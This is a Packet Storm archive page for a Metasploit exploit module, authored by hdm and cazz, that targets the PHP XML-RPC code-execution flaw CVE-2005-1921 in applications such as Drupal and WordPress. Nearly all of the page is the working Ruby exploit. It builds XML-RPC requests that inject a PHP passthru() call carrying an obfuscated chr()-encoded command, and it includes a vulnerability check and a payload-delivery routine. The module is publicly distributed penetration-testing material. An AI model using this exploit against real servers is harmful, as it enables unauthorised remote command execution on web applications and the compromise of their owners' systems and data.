what you don't know can hurt you

PHP XML-RPC Arbitrary Code Execution

PHP XML-RPC Arbitrary Code Execution
Posted Oct 30, 2009
Authored by H D Moore, cazz | Site metasploit.com

This Metasploit module exploits an arbitrary code execution flaw discovered in many implementations of the PHP XML-RPC module. This flaw is exploitable through a number of PHP web applications, including but not limited to Drupal, Wordpress, Postnuke, and TikiWiki.

tags | exploit, web, arbitrary, php, code execution
advisories | CVE-2005-1921
MD5 | cea4cd1d99b0e5eb14b3f425347482c5

PHP XML-RPC Arbitrary Code Execution

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::HttpClient

# XXX This module needs an overhaul
def initialize(info = {})
super(update_info(info,
'Name' => 'PHP XML-RPC Arbitrary Code Execution',
'Description' => %q{
This module exploits an arbitrary code execution flaw
discovered in many implementations of the PHP XML-RPC module.
This flaw is exploitable through a number of PHP web
applications, including but not limited to Drupal, Wordpress,
Postnuke, and TikiWiki.
},
'Author' => [ 'hdm', 'cazz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2005-1921'],
['OSVDB', '17793'],
['BID', '14088'],
],
'Privileged' => false,
'Platform' => ['unix', 'solaris'],
'Payload' => {
'Space' => 512,
'DisableNops' => true,
'Keys' => ['cmd', 'cmd_bash'],
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2005'
))


register_options(
[
OptString.new('PATH', [ true, "Path to xmlrpc.php", '/xmlrpc.php']),
], self.class
)

deregister_options(
'HTTP::junk_params', # not your typical POST, so don't inject params.
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
)
end

def go(command)

encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
wrapper = rand_text_alphanumeric(rand(128)+32)

cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"

xml =
'<?xml version="1.0"?>' +
"<methodCall>" +
"<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
"<params><param>" +
"<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
"<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
"</param></params>" +
"</methodCall>";

res = send_request_cgi({
'uri' => datastore['PATH'],
'method' => 'POST',
'ctype' => 'application/xml',
'data' => xml,
}, 5)


if (res and res.body)
b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
end
end
end

return nil
end

def check
response = go("echo ownable")
if (!response.nil? and response =~ /ownable/sm)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end

def exploit
response = go(payload.encoded)
if response == nil
print_status('exploit failed')
else
if response.length == 0
print_status('exploit successful')
else
print_status("Command returned #{response}")
end
handler
end
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close